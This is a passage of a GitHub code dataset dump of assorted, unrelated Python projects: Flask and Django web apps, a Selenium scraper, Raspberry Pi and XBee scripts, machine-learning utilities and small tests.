Flask(__name__)\n\nserver = smtplib.SMTP_SSL('smtp.gmail.com', 465)\n\nserver_username = \"aadeshmailtester@gmail.com\"\nserver_password = \"\"\n\n@app.route('/')\ndef hello_world():\n return \"Hello World\"\n\n@app.route('/emails', methods=[\"POST\"])\ndef get_mail():\n request_data = request.get_json(force=True)\n try:\n to = request_data[\"to\"]\n subject = request_data[\"subject\"]\n body = request_data[\"body\"]\n except KeyError:\n return \"Please check the json object\"\n \n if len(to) == 0:\n return \"Please check receiver mail address\"\n\n bodyTrail = \"\"\"\\\n \n \n \n

%s

\n

Regards

\n

Aadesh Agarwal

\n

MEng Student at Virginia Tech
\n Computer Science
\n Fall 2023
\n LinkedIn
\n GitHub\n

\n \n \n \"\"\" % (body.capitalize())\n\n message = MIMEMultipart(\"alternative\")\n message['From'] = \"Future Intern - Task Complete\"\n message['To'] = to\n message['Subject'] = subject.capitalize()\n message.attach(MIMEText(body, 'plain'))\n message.attach(MIMEText(bodyTrail, 'html'))\n\n server.login(server_username, server_password)\n\n server.sendmail(server_username, to, message.as_string())\n\n return \"Please Check your Inbox\"\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"aadesh-agarwal8888/mailsender","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25084431550","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponseRedirect\n\nfrom .models import LongURL\nimport random\n\nletter = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'\n\n\ndef generate_code():\n code = []\n for i in range(8):\n character = random.choice(letter) + str(random.randint(0, 9))\n code.insert(random.randint(0, len(code)), random.choice(character))\n return ''.join(code)\n\ndef index(request):\n if request.method == 'POST':\n long_url = LongURL()\n long_url.url = request.POST['url']\n long_url.code = generate_code()\n long_url.save()\n return render(request, \"info.html\", {\"long_url\": long_url})\n return render(request, \"redirector.html\")\n\ndef redirect(request, code):\n long_url = LongURL.objects.get(code=code)\n return HttpResponseRedirect(long_url.url)\n\n\n","repo_name":"graytoli/pdxcode_labs","sub_path":"django_projects/django-url-shortener/redirector/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25446839107","text":"from flask import Flask, jsonify, request\nfrom flask_mysqldb import MySQL\nfrom app import *\n\n\napp.config['MYSQL_HOST'] = 'localhost'\napp.config['MYSQL_USER'] = 'root'\napp.config['MYSQL_PASSWORD'] = ''\napp.config['MYSQL_DB'] = 'echange_culturel_fsbm'\napp.config['MYSQL_CURSORCLASS'] = 'DictCursor'\n\nmysql = MySQL(app)\n\n# Route pour récupérer tous les événements\n@app.route('/events', methods=['GET'])\ndef get_events():\n cur = mysql.connection.cursor()\n cur.execute(\"SELECT * FROM events\")\n events = cur.fetchall()\n cur.close()\n return jsonify(events)\n\n# Route pour ajouter un nouvel événement\n@app.route('/events/add', methods=['POST'])\ndef add_event():\n title = request.json['title']\n description = request.json['description']\n date = request.json['date']\n location = request.json['location']\n\n cur = mysql.connection.cursor()\n cur.execute(\"INSERT INTO events (title, description, date, location) VALUES (%s, %s, %s, %s)\",\n (title, description, date, location))\n mysql.connection.commit()\n cur.close()\n\n return jsonify({'message': 'Événement ajouté avec succès'})\n\n# Route pour confirmer un événement\n@app.route('/events/confirm/', methods=['POST'])\ndef confirm_event(event_id):\n cur = mysql.connection.cursor()\n cur.execute(\"UPDATE events SET isConfirmed = 1 WHERE id = %s\", (event_id,))\n mysql.connection.commit()\n cur.close()\n\n return jsonify({'message': 'Confirmation réussie'})\n\n# Route pour filtrer les événements par date\n@app.route('/events/filter', methods=['POST'])\ndef filter_events():\n start_date = request.json['start_date']\n end_date = request.json['end_date']\n\n cur = mysql.connection.cursor()\n cur.execute(\"SELECT * FROM events WHERE date BETWEEN %s AND %s\", (start_date, end_date))\n filtered_events = cur.fetchall()\n cur.close()\n\n return jsonify(filtered_events)\n\n# Route pour supprimer un événement\n@app.route('/events/delete/', methods=['DELETE'])\ndef delete_event(event_id):\n cur = mysql.connection.cursor()\n cur.execute(\"DELETE FROM events WHERE id = %s\", (event_id,))\n mysql.connection.commit()\n cur.close()\n\n return jsonify({'message': 'Événement supprimé avec succès'})\n\n# Route pour modifier un événement\n@app.route('/events/edit/', methods=['PUT'])\ndef edit_event(event_id):\n title = request.json['title']\n description = request.json['description']\n date = request.json['date']\n location = request.json['location']\n\n cur = mysql.connection.cursor()\n cur.execute(\"UPDATE events SET title = %s, description = %s, date = %s, location = %s WHERE id = %s\",\n (title, description, date, location, event_id))\n mysql.connection.commit()\n cur.close()\n\n return jsonify({'message': 'Événement modifié avec succès'})\n\n","repo_name":"ikrameezzirague/back-end-echange-culturel-fsbm","sub_path":"events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74296444007","text":"#!/usr/bin/env python3\n\nimport pytest\nimport os\n\n@pytest.mark.order(4)\ndef test_copy_video():\n \"\"\"Duplicate file /tmp/pilapse-test/image2vid.mp4 2 times\"\"\"\n\n if not os.path.isfile('/tmp/pilapse-test/image2vid.mp4'):\n pytest.skip(\"No process video file found\")\n\n workDir = '/tmp/pilapse-test'\n\n import shutil\n source = os.path.join(workDir, 'image2vid.mp4')\n\n for dupName in ['dup1', 'dup2']:\n shutil.copyfile(source, os.path.join(workDir, f\"image2vid-{dupName}.mp4\"))\n\n\n@pytest.mark.order(5)\ndef test_merge_video():\n \"\"\"Merge 2 above duplicated videos\"\"\"\n\n workDir = '/tmp/pilapse-test'\n video1 = os.path.join(workDir, 'image2vid-dup1.mp4')\n video2 = os.path.join(workDir, 'image2vid-dup2.mp4')\n\n if not (os.path.isfile(video1) and os.path.isfile(video2)):\n pytest.skip(\"Not enough duplicated video files found\")\n\n from moviepy.editor import VideoFileClip, concatenate_videoclips\n\n video1 = VideoFileClip(video1)\n video2 = VideoFileClip(video2)\n merged = concatenate_videoclips([video1, video2])\n merged.write_videofile(os.path.join(workDir, 'merged.mp4'))","repo_name":"git-akihakune/pilapse","sub_path":"tests/remote/unit/test_mergevideo.py","file_name":"test_mergevideo.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14631304064","text":"from pathlib import Path\n\n\ndef parse_input(inp: str) -> list[list[str]]:\n lines = inp.split(\"\\n\")\n return [line.split()[-4:] for line in lines]\n\n\ndef filter_1478(digs: list[str]) -> list[str]:\n return [dig for dig in digs if len(dig) in {2, 3, 4, 7}]\n\n\ndef solve(inp: str) -> int:\n digits = parse_input(inp)\n filtered_digits = list(map(filter_1478, digits))\n return sum(map(len, filtered_digits))\n\n\nif __name__ == \"__main__\":\n path = Path(__file__).parents[1] / \"inputs\" / \"day_08.txt\"\n\n with open(path) as f:\n inp = f.read().strip()\n\n print(solve(inp))\n","repo_name":"fabio-reale/aoc-solutions","sub_path":"2021/python/day_08a.py","file_name":"day_08a.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72413153769","text":"import RPi.GPIO as GPIO\n\nfrom log_lib import log\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\n\n\ndef set_pin(pin_id, value):\n GPIO.setup(pin_id, GPIO.OUT)\n log(f\" Pin {pin_id} set to {value}\")\n GPIO.output(pin_id, value)\n","repo_name":"SergeNov/sprinkler","sub_path":"gpio_lib.py","file_name":"gpio_lib.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20673485225","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\n\ntry:\n from src.utils import cprint\n from src.utils import o_fmt_error\nexcept:\n from utils import cprint\n from utils import o_fmt_error\n\nclass Driver:\n def __init__(self, browser=\"chrome\", driver_path=r'drivers/',results_path='results/similarweb/'):\n \"\"\"\n Inicializa el objeto Driver con el navegador especificado (por defecto, Chrome).\n\n Args:\n browser (str): El navegador a utilizar: 'chrome', 'firefox', o 'edge'.\n \"\"\"\n\n # Atributos\n self.driver_path = driver_path\n self.results_path = results_path\n self.browser = browser\n self.html_content = ''\n\n def __del__(self):\n \"\"\"\n Destructor para cerrar el navegador cuando se libera la instancia de la clase.\n \"\"\"\n self.close_driver()\n\n def open_driver(self):\n \"\"\"\n \"\"\"\n try:\n if self.browser == \"chrome\":\n # Deshabilito la lectura de puertos USB\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument(\"--disable-usb-device-detection\")\n chrome_options.add_experimental_option('excludeSwitches', ['enable-logging']) # Este es el que funciona\n # Abro el driver\n self.driver = webdriver.Chrome(\n self.driver_path + '\\chromedriver.exe',\n options = chrome_options\n )\n elif self.browser == \"firefox\":\n self.driver = webdriver.Firefox(self.driver_path + '\\chromedriver.exe')\n elif self.browser == \"edge\":\n self.driver = webdriver.Edge(self.driver_path + '\\chromedriver.exe')\n else:\n raise ValueError(\"Navegador no válido. Debe ser 'chrome', 'firefox' o 'edge.\")\n except Exception as e:\n msg = f\"Error al abrir el navegador: {e}\"\n cprint(msg)\n o_fmt_error('0001', msg, 'Class__Driver')\n\n def close_driver(self):\n \"\"\"\n Cierra el navegador y finaliza la instancia del objeto Driver.\n \"\"\"\n try:\n self.driver.quit()\n except Exception as e:\n msg = f'No hay ningun driver que cerrar\\n{e}'\n cprint(msg)\n o_fmt_error('0002', msg, 'Class__Driver')\n\n def open_url(self, url):\n \"\"\"\n Carga una página web, espera un tiempo y guarda el HTML en un archivo.\n\n Args:\n url (str): La URL de la página web a cargar.\n \"\"\"\n try:\n self.driver.get(url)\n except Exception as e:\n msg = f\"Error al cargar la URL: {e}\"\n cprint(msg)\n o_fmt_error('0003', msg, 'Class__Driver')\n\n def update_html_content(self):\n self.html_content = self.driver.page_source\n\n def save_html_content(self, filename=\"scraped_page.html\"):\n try:\n # Guardo el contenido HTML\n with open(filename, \"w\", encoding=\"utf-8\") as file:\n file.write(self.driver.page_source)\n cprint(f'\\t--> HTML content saved into {filename}')\n except Exception as e:\n msg = f\"Error al intentar guardar contenido HTML en el archivo {filename}\\nCodigo de error: {e}\"\n cprint(msg)\n o_fmt_error('0004', msg, 'Class__Driver')\n\n def save_html_after_delay(self, delay=5, filename=\"scraped_page.html\"):\n \"\"\"\n Carga una página web, espera un tiempo y guarda el HTML en un archivo.\n\n Args:\n delay (int): El tiempo de espera en segundos antes de guardar el HTML (por defecto, 5 segundos).\n filename (str): El nombre del archivo en el que se guardará el HTML (por defecto, \"scraped_page.html\").\n \"\"\"\n # Seteo el delay\n self.update_html_content()\n\n # Actualizo el contenido HTML\n time.sleep(delay) # Espera el tiempo especificado\n\n # Guardo el contenido HTML\n self.save_html_content(filename=filename)\n\n def save_html_after_find(self, timeout=30, filename=\"scraped_page.html\"):\n\n try:\n # Define un tiempo máximo de espera\n wait = WebDriverWait(self.driver, timeout)\n\n # Espera hasta que aparezca el elemento con la clase \"app-section__content\"\n elemento = wait.until(\n EC.presence_of_element_located((By.CLASS_NAME, 'app-section__content'))\n )\n\n # Una vez que el elemento está presente, obtén el contenido HTML\n contenido_html = elemento.get_attribute('outerHTML')\n\n # Actualizo el contenido HTML\n self.update_html_content()\n\n # Guardo el contenido HTML\n self.save_html_content(filename=filename)\n\n # Cierro el navegador\n self.close_driver()\n except Exception as e:\n msg = f\"\\t--> ERROR: Could not fetch data\\n\\t--> Driver.save_html_after_find()\\nError: {e}\"\n cprint(msg)\n o_fmt_error('0005', msg, 'Class__Driver')\n\n def scrap_url(self, url, alias, delay=20, save_method='find'):\n\n # Abro un driver\n self.open_driver()\n\n # Obtengo la pagina objetivo\n self.open_url(url)\n\n # Creo el nombre del archivo\n filename = f'html_{alias}.dat'\n filepath = f'{self.results_path}/{filename}'\n\n # Actualizo el contenido HTML del objeto\n # y guardo la pagina luego de un tiempo\n if save_method == 'wait':\n self.save_html_after_delay(delay=delay, filename=filepath)\n\n # Guardo el contenido HTML luego de que aparezca la pagina\n if save_method == 'find':\n self.save_html_after_find(timeout=delay, filename=filepath)\n\n # Cierro el navegador para liberar recursos\n self.close_driver()\n\n return filepath\n\n def scrap_url_list(self, input_list, delay=20):\n \"\"\"\n Args:\n list of url to scrap. Format --> (url, alias)\n \"\"\"\n\n for kk, input_element in enumerate(input_list):\n url = input_element[0].replace('//','/')\n alias = input_element[1]\n\n self.print_scrap_message(url, (kk+1), len(input_list))\n\n self.scrap_url(url, alias, delay=delay)\n\n def print_scrap_message(self, url, iter=None, total=None):\n if((iter is not None) and (total is not None)):\n cprint('Driver --> Scrap ({}/{})'.format(iter,total))\n cprint('\\t--> URL: {}'.format(url))\n\n# Ejemplo de uso\nif __name__ == \"__main__\":\n # Creo el objeto de tipo driver\n driver = Driver(browser=\"chrome\")\n\n # Armo una lista de webs a visitar\n url_list =[\n ('https://www.similarweb.com/website/youtube.com/', 'youtube'),\n ('https://www.similarweb.com/website/google.com/', 'google'),\n ]\n\n # Otros ejemplos\n # driver.open_url(\"https://www.ejemplo.com\")\n # driver.open_url(\"https://www.similarweb.com/top-websites/\")\n\n # Obtengo el codigo HTML para esas paginas\n driver.scrap_url_list(url_list, 20)\n\n # Cierro la pagina\n driver.close_driver()\n","repo_name":"santinieto/latinframe_soft","sub_path":"src/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":7261,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36240372654","text":"# This script concatenates an array of drug features to an array of\n# receptor features\n\nimport glob\nimport numpy as np\nimport pickle\nimport pandas as pd\nfrom tqdm import tqdm\n\n\n# Load drug vectors\ndef drug_vecs():\n drug_vecs = pickle.load(open(\"vectors.pkl\", 'rb'))\n print(\"Storing drug vectors\")\n drugs = interactions['ligand']\n X_drugs = drug_vecs.loc[drugs]\n print(\"Drug features shape:\", X_drugs.shape)\n return X_drugs\n\n\n# Load receptor vectors\ndef receptor_vecs():\n receptor_vecs = pd.read_csv(\"all_receptor_vecs.csv\", index_col=0)\n print(\"Storing receptor vectors\")\n receptors = interactions['receptor']\n X_receptors = receptor_vecs.loc[receptors]\n print(\"Receptor features shape:\", X_receptors.shape)\n return X_receptors\n\n\nif __name__ == \"__main__\":\n # Read data of receptor ids\n receptor_data = glob.glob(\"receptor_ids/*.csv\")\n cols = [\"Uniprot ID\", \"GeneSymbol\"]\n receptor_ids = pd.DataFrame(columns=cols)\n\n for f in receptor_data:\n data = pd.read_csv(f)\n receptor_ids = pd.concat([receptor_ids, data], axis=0)\n\n all_files = glob.glob(\"ligands/*/*.csv\")\n cols = [\"receptor\", \"ligand\", \"affinity\"]\n interactions = pd.DataFrame(columns=cols)\n\n # Open each ligand file and store the receptor, ligands and activity\n print(\"Storing interactions\")\n for f in tqdm(all_files[:300]):\n temp_df = pd.DataFrame(columns=cols)\n receptor = f.replace(\"_ligands.csv\", \"\").split(\"/\")[-1]\n r_id = receptor_ids.loc[receptor_ids.GeneSymbol == receptor]['Uniprot ID']\n ligfile = pd.read_csv(f)\n num_ligands = ligfile.shape[0]\n ligs = ligfile['molecule_chembl_id']\n affinities = ligfile['pchembl_value']\n temp_df['receptor'] = np.full(num_ligands, r_id)\n temp_df['ligand'] = ligs\n temp_df['affinity'] = affinities\n interactions = pd.concat([interactions, temp_df], axis=0)\n # Drop NAs\n interactions = interactions.dropna()\n interactions.to_csv(\"interactions.csv\")\n print(\"Interactions:\", interactions.shape)\n\n X_drugs = drug_vecs()\n X_receptors = receptor_vecs()\n\n # Combine features\n X = np.concatenate([X_receptors, X_drugs], axis=1)\n print(\"All features shape:\", X.shape)\n\n # Extract values\n Y = np.array(interactions['affinity'])\n print(\"Y values shape:\", Y.shape)\n\n # Save \n print(\"Pickling\")\n pickle.dump(X, open(\"X_features.pkl\", 'wb'))\n pickle.dump(Y, open(\"Y_values.pkl\", 'wb'))\n print(\"Saving to file\")\n np.savetxt(\"X_features.csv\", X, delimiter=\",\")\n np.savetxt(\"Y_values.csv\", Y, delimiter=\",\")\n","repo_name":"ravila4/DTIpred","sub_path":"src/features/prepare_data.py","file_name":"prepare_data.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"38614927068","text":"from test_prog.lib_classes.cls_new_test import BaseTest\nfrom test_prog import lib_app_windows as law\nfrom time import sleep\n\n\nclass Test(BaseTest):\n def test_name(self):\n \"\"\"User should be able to authenticate via email\"\"\"\n # Arrange:\n sleep(5)\n description = law.WinStartRegistration.BTN_SIGN_IN_WITH_EMAIL\n email_btn = self.driver.find_obj(description)\n email_btn.click()\n sleep(10)\n\n # Act:\n description = law.RegistrationByEmail.LABEL_SET_EMAIL\n email_field = self.driver.find_obj(description)\n email_field.click()\n email_field.send_keys('test@shlokas.app')\n sleep(3)\n\n description = law.RegistrationByEmail.BTN_SEND_EMAIL\n submit = self.driver.find_obj(description)\n submit.click()\n sleep(10)\n\n # Assert:\n description = law.WindowLibrary.BTN_DWN_BAR_SETTING\n setting = self.driver.find_obj(description)\n setting.click()\n sleep(3)\n\n description = law.WindowSetting.SLD_ACCOUNT\n account = self.driver.find_obj(description)\n account.click()\n sleep(5)\n\n description = law.SubWinAccount.TXT_WELCOME\n welcome = self.driver.find_obj(description)\n self.assertTrue(welcome)\n\n\nif __name__ == '__main__':\n print('тест запускается с body_test.py')\n","repo_name":"akdasa-studios/shlokas-e2e-mobile","sub_path":"test_prog/lib_tests/test_00.py","file_name":"test_00.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2418413501","text":"# 202203011001\n# https://leetcode-cn.com/problems/flood-fill/comments/\n# 英文说明更好懂 https://leetcode.com/problems/flood-fill/comments/\n# +-+-+-+ +-+-+-+\n# |1|1|1| |2|2|2|\n# +-+-+-+ +-+-+-+\n# |1|1|0| -> |2|2|0|\n# +-+-+-+ +-+-+-+\n# |1|0|1| |2|0|2|\n# +-+-+-+ +-+-+-+\nfrom typing import List\n\n\nclass Solution:\n def floodFill(self, image: List[List[int]], sr: int, sc: int, newColor: int) -> List[List[int]]:\n # 深度优先算法\n oldColor = image[sr][sc]\n dfs(image, sr, sc, oldColor, newColor)\n return image\n\n\ndef dfs(image, sr, sc, oldColor, newColor):\n if sr < 0 or sr >= len(image):\n return image\n if sc < 0 or sc >= len(image[sr]):\n return image\n if image[sr][sc] != oldColor or image[sr][sc] == newColor:\n return image\n image[sr][sc] = newColor\n dfs(image, sr - 1, sc, oldColor, newColor)\n dfs(image, sr + 1, sc, oldColor, newColor)\n dfs(image, sr, sc - 1, oldColor, newColor)\n dfs(image, sr, sc + 1, oldColor, newColor)\n","repo_name":"alex-1q84/leetcode","sub_path":"python/src/leetcode/begin_algorithm/flood_fill.py","file_name":"flood_fill.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19788787214","text":"import tensorflow as tf\n\n\nclass TFLogger:\n \n def __init__(self, summary_names, session):\n self.log_ops = {}\n self.session = session\n # register summaries\n for name in summary_names:\n if name not in self.log_ops:\n ph = tf.placeholder(dtype=tf.float32, shape=(), name='ph_'+name)\n summary = tf.summary.scalar(\n name=name,\n tensor=ph\n )\n self.log_ops[name] = ph\n self.merged = tf.summary.merge_all()\n \n def create_writer(self, log_dir):\n return tf.summary.FileWriter(log_dir, self.session.graph)\n \n def log(self, writer, log_dict, step):\n feed_dict = {}\n for name, value in log_dict.items():\n if name not in self.log_ops:\n continue\n # fill the placeholders\n feed_dict[self.log_ops[name]] = value\n fetches = {'summary':self.merged}\n fetched = self.session.run(fetches, feed_dict=feed_dict)\n writer.add_summary(fetched['summary'], global_step=step)\n writer.flush()","repo_name":"Abadhor/master-thesis-repo","sub_path":"tensorflow/TFLogger.py","file_name":"TFLogger.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38203905830","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nimport serial\nimport time\nfrom xbee import XBee\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom collections import deque\n\nCOOLDOWN = 0\nTRESHOLD_INCOMING = 1\nTRESHOLD_LEAVING = -1\nTRESHOLD_CLOSE = 65\nSIZE_BUFFER = 5\nTIMEOUT = 2\n\nclass XbeeDir():\n\tdef __init__(self, serial_port):\n\t\ttry:\n\t\t\tself.serial_port = serial.Serial(serial_port, 9600)\n\t\t\tself.xbee = XBee(self.serial_port, callback=self.data_callback)\n\t\texcept:\n\t\t\tprint(\"Error creating serial link\")\n\t\t\texit()\n\t\tself.direction = \"NONE\"\n\t\tself.position = \"LOIN\"\n\t\tself.RSSI_buffer = deque(SIZE_BUFFER*[0], SIZE_BUFFER)\n\t\tself.LED_buffer = deque(3*[0], 3)\n\t\tself.previous_rcv = 0\n\t\tself.counter = 0\n\t\tself.sending_pics_flag = False\n\t\tself.bollard_command = \"OFF\"\n\t\n\tdef data_callback(self, data):\n\t\t#print(data)\n\t\tself.counter += 1\n\t\tnow = time.time()\n\t\tif (now - self.previous_rcv) >= COOLDOWN:\n\t\t\tID = data[\"rf_data\"].decode().split(\":\")[0]\n\t\t\tcommand = data[\"rf_data\"].decode().split(\":\")[1]\n\t\t\tif ID == \"HL118\":\n\t\t\t\tself.RSSI_buffer.appendleft(ord(data[\"rssi\"].decode()))\n\t\t\t\tself.compute_bollard_command()\n\t\t\tif command == \"1\":\n\t\t\t\tself.sending_pics_flag = True\n\t\t\telse:\n\t\t\t\tself.sending_pics_flag = False\n\t\t\tself.previous_rcv = now\n\t\t\t\n\tdef compute_direction(self):\n\t\tif not 0 in self.RSSI_buffer:\n\t\t\tmean_gradient = np.mean(np.gradient(self.RSSI_buffer))\n\t\t\t\n\t\t\tif mean_gradient > TRESHOLD_INCOMING:\n\t\t\t\tself.direction = \"INCOMING\"\n\t\t\telif mean_gradient < TRESHOLD_LEAVING:\n\t\t\t\tself.direction = \"LEAVING\"\n\t\t\telse:\n\t\t\t\tself.direction = \"NONE\"\n\t\t\t\n\t\t\t#print(\"Dir : {} ({}) ({})\".format(self.direction, mean_gradient, np.mean(self.RSSI_buffer)))\n\t\n\tdef connexion_lost(self): \n now = time.time()\n if now - self.previous_rcv >= TIMEOUT:\n print(\"Connexion lost\", end=\"\\r\")\n return True\n else:\n return False\n \n\tdef compute_position(self):\n\t\tif not 0 in self.RSSI_buffer:\n\t\t\tmean_RSSI = np.mean(self.RSSI_buffer)\n\t\t\t\n\t\t\tif mean_RSSI < TRESHOLD_CLOSE:\n\t\t\t\tself.position = \"PRES\"\n\t\t\telse:\n\t\t\t\tself.position = \"LOIN\"\n\t\t\t\n\t\t\tprint(\"Pos : {} ({})\".format(self.position, mean_RSSI), end=\"\\r\")\n\t\t\t\n\tdef compute_bollard_command(self):\n\t\tself.compute_position()\n\t\tself.compute_direction()\n\t\t\n\t\tif self.position == \"PRES\":\n\t\t\tself.LED_buffer.appendleft(1)\n\t\t\tself.bollard_command = \"ON\"\n\t\telse:\n\t\t\tself.LED_buffer.appendleft(0)\n\t\t\tself.bollard_command = \"OFF\"\n\t\t#if not 0 in self.LED_buffer:\n\t\t#\tself.bollard_command = \"ON\"\n\t\t#else:\n\t\t#\tself.bollard_command = \"OFF\"\n\t\t#print(self.bollard_command + \" \", end=\"\\r\")\n\t\t\t\nif __name__ == \"__main__\":\n\t\n\tmyXbeeDir = XbeeDir(\"/dev/ttyUSB0\")\n\t\n\twhile True:\n\t\ttry:\n\t\t\ttime.sleep(0.0001)\n\t\texcept KeyboardInterrupt:\n\t\t\tbreak\n\t\n\tmyXbeeDir.xbee.halt()\n\tmyXbeeDir.serial_port.close()\n","repo_name":"goowza/Project_Drogon","sub_path":"raspberry/Borne/RSSI_Receive.py","file_name":"RSSI_Receive.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21446432576","text":"import random\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom pandas import DataFrame,Series\r\nfrom sklearn.linear_model import LinearRegression\r\n\r\n# 读取数据\r\ndatafile = './dataset/housing.xlsx'\r\ndata = pd.read_excel(datafile)\r\nexamDf = np.mat(data)\r\nm = len(examDf)\r\nmin = examDf.min(axis=0)\r\nmax = examDf.max(axis=0)\r\n# 标准化\r\nfor i in range(0,14):\r\n examDf[:, i] = (examDf[:, i] - min[0,i]) / (max[0,i] - min[0,i])\r\n\r\n#分离X和Y\r\nX = examDf[:,0:13]\r\nY = examDf[:,13:14]\r\n# print(X)\r\n# print(Y)\r\n\r\n# 代价函数,求每个样本方程计算的值与实际值的差值\r\ndef computeCostDeri(X, Y, theta):\r\n return np.dot(X, theta) - Y\r\n#代价函数cost,用于计算每轮迭代的代价\r\ndef computeCost(inner):\r\n inner = np.power(inner, 2)\r\n return np.sum(inner) / (2 * m)\r\n# 批量梯度下降BGD\r\ndef BGD(X, Y, theta, alpha, turn):\r\n ret = np.zeros(turn) #ret保存每次迭代计算的代价cost\r\n error = 0\r\n for t in range(0, turn):\r\n # 每步循环,求各样本损失函数inner\r\n inner = computeCostDeri(X,Y,theta)\r\n error = computeCost(inner)\r\n ret[t] = error\r\n cost = np.zeros((13,1))\r\n for i in range(0, m):\r\n cost += inner[i,0] * X[i,:].T\r\n theta = theta - cost * alpha / m\r\n if error <= 1e-15:\r\n break\r\n return ret\r\n\r\n\r\nalpha = 0.001\r\ntheta = np.zeros((13, 1))\r\nturn = 1000\r\nret = BGD(X, Y, theta, alpha, turn)\r\nprint(ret)\r\n\r\n# BGD图表\r\nnumx = []\r\nnumy = []\r\nstep = 50\r\nfor i in range(0, 20):\r\n numx.append(i * step)\r\n cur = ret[i * step]\r\n numy.append(cur)\r\nplt.xlabel('iteration')\r\nplt.ylabel('cost')\r\nplt.plot(numx, numy)\r\nplt.title('BGD')\r\nplt.show()\r\n","repo_name":"LieFlatRemi/MachineLearningHw","sub_path":"01-GradientDescent/week03BGD.py","file_name":"week03BGD.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74859280486","text":"from constant import RESULT_CATEGORIES\n\n\n\"\"\"\nAllows to save the result of the recognition of an image with references into a csv file. \n\"\"\"\ndef save_result(file, time_create_hist_ref, time, distances, top, winner, test_ok, file_res):\n f = open(file_res, \"a\")\n f.write( \"Requete ;\" + file + \"\\n\\n\")\n\n f.write( \"Temps de création des histogrammes de références ;\" + str(time_create_hist_ref) + \"\\n\")\n f.write( \"Temps pour appliquer l'algorithme de reconnaissance d'image ;\" + str(time) + \"\\n\\n\")\n\n f.write(\"Résultat de la reconnaissance :\\n\")\n f.write(\"Position;Fichier;Distance\\n\")\n pos = 1\n for key, value in distances.items():\n f.write(str(pos) + \";\" + key + \";\" + str(value) + \"\\n\")\n pos = pos + 1\n\n f.write(\"\\nTop \" + str(len(top)) + \" :\\n\")\n f.write(\"Position;Fichier;Distance\\n\")\n pos = 1\n for key, value in top.items():\n f.write(str(pos) + \";\" + key + \";\" + str(value) + \"\\n\")\n pos = pos + 1\n\n if winner is None:\n winner = \"Inconnu\"\n f.write(\"\\nRésultat obtenu ;\" + winner)\n resul_wanted = RESULT_CATEGORIES[file]\n if RESULT_CATEGORIES[file] is None:\n resul_wanted = \"Inconnu\"\n f.write(\"\\nRésultat attendu ;\" + resul_wanted )\n f.write(\"\\nTest OK ;\" + str(test_ok) + \"\\n\\n\")\n\n f.close()\n\n","repo_name":"bdeleglise/Pictorial-content-description","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10694615453","text":"from matplotlib import pyplot as plt\nimport seaborn as sns\nimport numpy as np\nimport os\n\ndef plot_evaluations(k_eval_df, save_dir, run):\n \"\"\"\n dir_type: Directory type, which refers to if folders structured k/plots/eval or plots/eval/plottype/run.png\n \"\"\"\n\n plt.figure(figsize=(10, 7))\n\n plt.title('Accuracy')\n plt.xlabel('Epoch')\n plt.ylabel('Accuracy')\n plt.plot(k_eval_df['Epoch'], k_eval_df['Train Accuracy'], label='Training')\n plt.plot(k_eval_df['Epoch'], k_eval_df['Validation Accuracy'], label='Validation')\n plt.legend()\n name = str(run)+'_accuracy.png'\n plt.savefig(save_dir+'/plots/accuracies/'+name)\n plt.clf()\n\n # Plot train/validation auc\n plt.title('AUC')\n plt.xlabel('Epoch')\n plt.ylabel('AUC')\n plt.plot(k_eval_df['Epoch'], k_eval_df['Train AUC'], label='Training AUC')\n plt.plot(k_eval_df['Epoch'], k_eval_df['Validation AUC'], label='Validation AUC')\n plt.legend()\n name = 'AUC/'+str(run)+'_AUC.png'\n plt.savefig(save_dir+'/plots'+'/'+name)\n plt.clf()\n\n # Plot training loss\n plt.title('Loss')\n plt.xlabel('Epoch')\n plt.ylabel('Loss')\n plt.plot(k_eval_df['Epoch'], k_eval_df['Train Loss'], label='Training')\n 